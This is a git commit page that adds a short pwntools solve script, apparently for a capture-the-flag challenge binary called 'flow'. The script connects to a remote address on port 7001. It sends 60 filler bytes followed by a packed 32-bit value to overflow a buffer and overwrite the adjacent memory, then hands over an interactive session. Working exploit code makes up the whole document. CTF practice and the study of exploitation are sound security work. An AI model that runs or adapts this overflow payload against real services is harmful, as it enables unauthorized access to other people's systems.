solve script
This commit is contained in:
@@ -0,0 +1,17 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./flow", checksec=False)
|
||||
# r = process()
|
||||
r = remote("94.72.112.248", 7001)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b": ", a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*60
|
||||
buf += p32(0x34333231)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
Reference in New Issue
Block a user